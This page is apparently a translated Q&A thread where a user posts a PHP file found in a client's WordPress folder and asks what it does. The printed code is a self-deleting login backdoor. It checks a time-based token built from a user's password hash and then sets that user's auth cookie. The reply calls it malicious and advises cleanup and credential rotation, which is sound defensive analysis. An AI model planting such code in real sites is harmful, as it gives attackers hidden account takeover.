个性化阅读
专注于IT技术分析

我文件夹下文件中的恶意代码。只想知道他在做什么

我在客户文件夹中发现一个奇怪的文件。我想知道这段代码的作用。这是什么意思

$file =( $p = strpos(__FILE__, "(") )=== false ? __FILE__ : 
substr(__FILE__, 0, $p);if (!unlink($file)){  chmod($file, 0777);   
unlink($file);}define("ABSPATH", dirname(dirname($file))."/");
include_once(ABSPATH."wp-config.php");
include_once(ABSPATH."wp-admin/includes/file.php");
include_once(ABSPATH."wp-admin/includes/plugin.php");
include_once(ABSPATH."wp-admin/includes/theme.php");
include_once(ABSPATH."wp-admin/includes/misc.php");
$k = substr($_SERVER["QUERY_STRING"], 0, 32);$u = 
 substr($_SERVER["QUERY_STRING"], 32);
$h = $wpdb->get_var( $wpdb->prepare( 
 "SELECT user_pass FROM {$wpdb->users} WHERE ID = %s", $u ) );
if ( 
 is_string($h) &&( $k === md5(mktime(date("H"), date("i"), 0).md5($h))                    
 || $k === md5(mktime(date("H"), date("i")-1, 0).md5($h))                    
 || $k === md5(mktime(date("H"), date("i")+1, 0).md5($h)) )){    
wp_set_auth_cookie($u);}header("Location: 
 ".\'http://www.example.com/blog/wp-admin/\');', LOCK_EX);

请帮助我有关此代码。是黑客代码还是其他?


#1


我想你可以将其称为黑客代码。

它读取站点的敏感部分以获取盐和哈希值, 然后从数据库中获取密码。我认为你所有的凭据在该站点上都受到了损害。

删除文件并清理站点后, 你应该使用所有权限轮换所有凭据, 并快速编辑config.php文件, 以用Wordpress API生成的新密钥替换盐键。

赞(0)
未经允许不得转载:srcmini » 我文件夹下文件中的恶意代码。只想知道他在做什么

评论 抢沙发

评论前必须登录!